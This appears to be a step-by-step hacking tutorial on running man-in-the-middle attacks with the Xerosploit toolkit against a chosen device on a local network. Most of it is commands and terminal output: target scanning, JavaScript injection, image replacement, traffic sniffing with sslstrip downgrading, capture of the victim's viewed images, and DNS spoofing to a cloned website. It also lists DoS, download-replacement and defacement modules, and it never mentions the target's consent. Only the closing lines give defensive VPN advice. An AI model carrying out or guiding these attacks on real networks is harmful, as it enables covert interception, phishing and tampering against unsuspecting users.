Advanced Man-in-the-Middle Attacks with Xerosploit

" "

Advanced Man-in-the-Middle Attacks with Xerosploit

A man-in-the-middle attack, or MitM attack, is when a hacker gets on a network and forces all nearby devices to connect to their machine directly. This lets them spy on traffic and even modify certain things. Bettercap is one tool that can be used for these types of MitM attacks, but Xerosploit can automate high-level functions that would normally take more configuration work in Bettercap.

Xerosploit rides on top of a few other tools, namely, Bettercap and Nmap, automating them to the extent that you can accomplish these higher-level concepts in just a couple of commands.

However, Xerosploit can be hit or miss, so don't be surprised if some webpages can't be spoofed because the target is using HTTPS or funneling traffic through a VPN. Considering 73% of all websites use HTTPS, you'll only have success manipulating webpages on the remaining 27%, and only if no VPN is being used.Some sites can still be accessed via HTTP because they aren't redirecting insecure requests to HTTPS, and some don't even have secure versions yet. Here is a small sample, but there are many more in that 27%:

• alternativenation.net
• baidu.com
• bu.edu
• drudgereport.com
• gnu.org
• go.com
• icio.us
• myshopify.com
• washington.edu
• weevil.info
• wikidot.com

What's Needed

We've only tested Xerosploit out on Ubuntu and Kali Linux, but it may work on macOS. However, you can only select between "Ubuntu / Kali Linux / Others" and "Parrot OS" during the installation process.

You'll also need the latest version of Python installed on your computer.

Step 1 Install Xerosploit

First, install Xerosploit off GitHub using git clone.

~$ git clone https://github.com/LionSec/xerosploit

Cloning into 'xerosploit' ...
remote: Enumerating objects: 306, done.
remote: Total 306 (delta 0), reused 0 (delta 0), pack-reused 306
Receiving objects: 100% (306/306), 793.28 KiB | 2.38 MiB/s, done.
Resolving deltas: 100% (68/68), done.

Then, change into its directory (cd) and start the installer using Python. It will ask you to select your operating system; if using Kali Linux, choose 1 and hit enter.

~$ cd xerosploit && sudo python install.py

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                     Xerosploit Installer                     █
█                                                              █
└══════════════════════════════════════════════════════════════┘

[++] Please choose your operating system.

1) Ubuntu / Kali Linux / Others
2) Parrot OS

>>> 1

[++] Insatlling Xerosploit ...
Get:1 http://kali.download/kali kali-rolling inRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main Sources [14.0 kB]

...

Xerosploit has been successfully installed. Execute 'xerosploit' in your termninal.

Step 2

Step 2 Install the Dependencies

For Xerosploit to do its job correctly, you'll need all of the tools that it built its service on top of, including Nmap, hping3, build-essential, ruby-dev, libpcap-dev, and libgmp3-dev. If you're using Kali, you probably already have all of these.

~/xerosploit$ sudo apt install nmap hping3 build-essential ruby-dev libpcap-dev libgmp3-dev

Reading package lists ... Done
Building dependency try ... Done
Reading state information ... Done
build-essential is already the newest version (12.9).
build-essential set to manually installed.
hping3 is already the newest version (3.a2.ds2-10).
hping3 set to manually installed.
nmap is already the newest version (7.91+dfsg1-1kali1).
nmap set to manually installed.
ruby-dev is already the newest version (1:2.7+2).
ruby-dev set to manually installed.
libpcap-dev is already the newest version (1.9.1-r0).
libpcap-dev set to manually installed.
libgmp3-dev is already the newest version (2:6.0.0+dfsg-6).
libgmp3-dev set to manually installed.

And use Python to install tabulate and terminaltables, which will let Xerosploit display information to you in an easy-to-read way. You likely already have these tools too.

~/xerosploit$ sudo pip3 tabulate terminaltables

Requirement already satisfied: tabulate in /usr/lib/python3/dist-packages (0.8.7)
Requirement already satisfied: terminaltables in /usr/lib/python3/dist-packages (3.1.0)

Step 3

Step 3 View Xerosploit's Commands

Start Xerosploit with the xerosploit command. Right away, it will show you information on your network configuration.

~/xerosploit$ sudo xerosploit

        ▄  ▄███▄   █▄▄▄▄ ████▄    ▄▄▄▄▄   █ ▄▄  █     ████▄ ▄█    ▄▄▄▄▀
    ▀▄   █ █▀   ▀  █  ▄▀ █   █   █     ▀▄ █   █ █     █   █ ██ ▀▀▀ █
      █ ▀  ██▄▄    █▀▀▌  █   █ ▄  ▀▀▀▀▄   █▀▀▀  █     █   █ ██     █
     ▄ █   █▄   ▄▀ █  █  ▀████  ▀▄▄▄▄▀    █     ███▄  ▀████ ▐█    █
    █   ▀▄ ▀███▀     █                     █        ▀        ▐   ▀
     ▀              ▀                       ▀

[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: www.neodrix.com ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘

╒════════════════════════════════════════════════════════════════════════════╤═══════════════════╤═════════════╤═════════╤═════════════╕
│                                 IP Address                                 │    MAC Address    │   Gateway   │  Iface  │  Hostname   │
╞════════════════════════════════════════════════════════════════════════════╪═══════════════════╪═════════════╪═════════╪═════════════╡
├────────────────────────────────────────────────────────────────────────────┼───────────────────┼─────────────┼─────────┼─────────────┤
│ 192.168.8.172 fd0b:ed07:cb03:10::3fa fd0b:ed07:cb03:10:dcf1:e71a:2dc3:299f │ 28:D2:44:23:54:2B │ 192.168.8.1 │  eth0   │ Macbook-Pro │
╘════════════════════════════════════════════════════════════════════════════╧═══════════════════╧═════════════╧═════════╧═════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ Xerosploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Type help to see all of the commands available in Xerosploit.

Xero ➮ help

╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan : Map your network.                                       ║
║          ║                                                                ║
║          ║ iface : Manually set your network interface.                   ║
║ COMMANDS ║                                                                ║
║          ║ gateway : Manually set your gateway.                           ║
║          ║                                                                ║
║          ║ start : Skip scan and directly set your target IP address.     ║
║          ║                                                                ║
║          ║ rmlog : Delete all xerosploit logs.                            ║
║          ║                                                                ║
║          ║ help : Display this help message.                              ║
║          ║                                                                ║
║          ║ exit : Close Xerosploit.                                       ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

Step 4 Run a Scan to Identify Targets

First, we'll do some recon to identify a target by running the scan command, which runs on top of Nmap.

Xero ➮ scan

[++} Mapping your network ...

[+]═══════════[ Devices found on your network ]═══════════[+]

╔═══════════════╦═══════════════════╦═══════════════════════════════╗
║ IP Address    ║ Mac Address       ║ Manufacturer                  ║
║═══════════════║═══════════════════║═══════════════════════════════║
║ 192.168.8.1   ║ 94:83:C4:00:EB:C5 ║ (Unknown)                     ║
║ 192.168.8.215 ║ B8:70:F4:AD:44:C8 ║ (Compal Information(kunshan)) ║
║ 192.168.8.172 ║ 28:D2:44:12:23:6B ║ (This device)                 ║
╚═══════════════╩═══════════════════╩═══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

You should see a list of IP addresses returned, and if all went well, one of those IP addresses would be the one you want to target. So, type in the IP address of the device you want to target. For me, it's the "kunshan" device.

Xero ➮ 192.168.8.215

[++] 192.168.8.215 ha been targeted.

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Now, it will ask you which module you want to run against the target. If you don't know the module you want, type help to see a complete list.

Xero»modules ➮ help

╔═════════╦════════════════════════════════════════════════════════════════════╗
║         ║                                                                    ║
║         ║ pscan      : Port Scanner                                          ║
║         ║                                                                    ║
║         ║ dos        : DoS Attack                                            ║
║         ║                                                                    ║
║         ║ ping       : Ping Request                                          ║
║         ║                                                                    ║
║         ║ injecthtml : Inject Html code                                      ║
║         ║                                                                    ║
║         ║ injectjs   : Inject Javascript code                                ║
║         ║                                                                    ║
║         ║ rdownload  : Replace files being downloaded                        ║
║         ║                                                                    ║
║         ║ sniff      : Capturing information inside network packets          ║
║ MODULES ║                                                                    ║
║         ║ dspoof     : Redirect all the http traffic to the specified one IP ║
║         ║                                                                    ║
║         ║ yplay      : Play background sound in target browser               ║
║         ║                                                                    ║
║         ║ replace    : Replace all web pages images with your own one        ║
║         ║                                                                    ║
║         ║ driftnet   : View all images requested by your targets             ║
║         ║                                                                    ║
║         ║ move       : Shaking Web Browser content                           ║
║         ║                                                                    ║
║         ║ deface     : Overwrite all web pages with your HTML code           ║
║         ║                                                                    ║
╚═════════╩════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮Step 5

Step 5 Shake the Target's Web Browser

Out of all the modules, the most simple one to run is move, which will shake the web browser on the target computer. This helps verify that we have access to the target, or at least, that we can manipulate their connection.

Xero»modules ➮ move

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Shakescreen                        █
█                                                              █
█                   Shaking Web Browser content                █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

To start the Shakescreen effect, use run, which will begin injecting JavaScript code into the browser whenever the target visits a website. But remember, it will only work on webpages that use HTTP and not HTTPS.

Xero»modules»shakescreen ➮ run

[++] Injecting shakescreen.js  ...

[++] Press 'Ctrl + C' to stop.

So as soon as they open an HTTP webpage, the page should start shaking uncontrollably. At first, the target might think something was wrong with their display until they noticed that the browser window itself and everything behind it are not vibrating. Then they might think their internet is having issues.

This will keep happening on every HTTP webpage they visit until you stop the attack with Control-C in the terminal.

stop
^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'move' command.

Xero»modules»shakescreen ➮

Step 6

Step 6 Replace All Images in the Target's Browser

Now, let's test out another module. To return to the module selection screen, type back and enter.

Xero»modules»shakescreen ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Xerosploit has a fun attack tool called replace that will let us swap out all of the images loading on an HTTP-based webpage with any picture that we want.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

To start the Image Replace tool, type run, and it will immediately ask you to add the picture's path.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮

Find an image on your computer, then either type out the path or drag-and-drop the image into the terminal window to auto-populate it. Hit enter to start the attack.

Xero»modules»replace ➮ /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] All images will be replaced by /root/Desktop/Bolton/index_files/JBolton_Walrus.jpg

[++] Press 'Ctrl + C' to stop .

Whenever an HTTP-based webpage loads on the target browser, all of its images will be replaced with the one image we chose. It doesn't always work 100%, so a few images may slip by unchanged, and it can be a little slow depending on the connection speed, but in general, it works pretty well.

This will continue to happen on every HTTP page until you stop the attack.

^C
Stopping MITM attack  ...

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮

Step 7

Step 7 Capture Data Over the Network

Let's try another module. To return to the module selection screen, type back and enter.

Xero»modules»replace ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

With the sniff module, we can capture some general data over the network.

Xero»modules ➮ sniff

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Once the Sniffing tool is selected, type run to begin sniffing. It will then ask you if you want to load sslstrip, which will attempt to downgrade traffic so that we can pick up some interesting information that we might otherwise lose.

Xero»modules»sniff ➮ run

[+] Do you want to load sslstrip ? (y/n).

Xero»modules»sniff ➮ y

[++] All logs are saved on : /opt/xerosploit/xerosniff

[++] Sniffing on 192.168.8.215

[++] sslstrip : ON

[++] Press 'Ctrl + C' to stop .

A new window should open to show all of the packets being intercepted and saved to your computer. In the window, you can easily see which websites the target is visiting and what data is being requested and sent.

When you're done sniffing packets, you can stop the attack with Control-C on your keyboard. Then, you'll be asked if you want to save the logs or not. Use Y for yes, N for no.

^C
Stopping MITM attack  ...

[+] Do you want to save logs ? (y/n).

Xero»modules»sniff ➮ n

[++] Logs have been removed.

[+] Please type 'run' to execute the 'sniff' command.

Xero»modules»sniff ➮

Step 8

Step 8 View All Images Loaded in the Target's Browser

Let's try another module. To return to the module selection screen, type back and enter.

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮

Enter driftnet, which is a tool that lets you view every single image that is requested by the target's browser, then run it. It will then start logging all pictures seen on HTTP webpages from the target browser and save them to the /opt/xerosploit/xedriftnet folder.

Xero»modules ➮ driftnet

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Driftnet                          █
█                                                              █
█          View all images requested by your target            █
└══════════════════════════════════════════════════════════════┘

[+] Enter 'run' to execute the 'driftnet' command.

Xero»modules»driftnet ➮ run

[++] Capturing requested images on 192.168.8.215  ...

[++] All captured images will be temporarily saved in /opt/xerosploit/xedriftnet

[++] Press 'Ctrl + C' to stop.

When ready to check out the treasure chest of goodies, open a separate terminal window, then change into the "xedriftnet" folder. You can list (ls) its contents then to see what was captured.

~$ cd /opt/xerosploit/xedriftnet

~/opt/xerosploit/xedriftnet$ ls

Step 9 Run the DNS Spoofing Module on a Target

If you want to re-route traffic to a specific IP address, the dspoof module can help. But first, you'll want to create a fake website to redirect others to on the network. So, visit a website you want to copy, save its HTML file, and rename it "index.html."

Next, open a separate terminal window and navigate to the same folder as the index.html file. Run the following command to create a local version of the webpage, changing the YOUR_IP part to the IP address of your machine.

~$ sudo python3 -m http.server --bind YOUR_IP 80

Then, return to the terminal window with Xerosploit, and run the dspoof command. But first, return to the module selection screen. Then, open and run the DNS spoofing tool.

When asked, give your IP address as the address to redirect traffic to. All webpages that load will be the page you cloned!

Xero»modules»sniff ➮ back

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ dspoof

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘

[+] Please type 'run' to execute the 'dspoof' command.

Xero»modules»dspoof ➮ run

[+] Enter the IP address where you want to redirect the traffic.

[++] Redirecting all the traffic to your IP address.

[++] Press 'Ctrl + C' to stop .

Step 10 Try Out Its Other Modules

The other modules you can try out include the following, some of which are pretty fun to test out.

• yplay: Play a YouTube video in the background of browsers.
• injectjs: Inject JavaScript into websites loaded by others on the network.
• injecthtml: Inject HTML instead into websites loaded on the network.
• dos: Deny internet access to that IP address.
• pscan: Run a port scan.
• ping: Ping a device.
• rdownload: Replace files being downloaded with your own.
• deface: Swap out every webpage with your own HTML.

Xerosploit is a vivid example of why you need to be careful of connecting to an unknown network. While a VPN can protect you in most cases, there are still ways an attacker can manipulate your traffic. So make sure to take as many precautions as possible, like utilizing a VPN, any time you're not sure about the security of the network you're about to connect to.

Direct link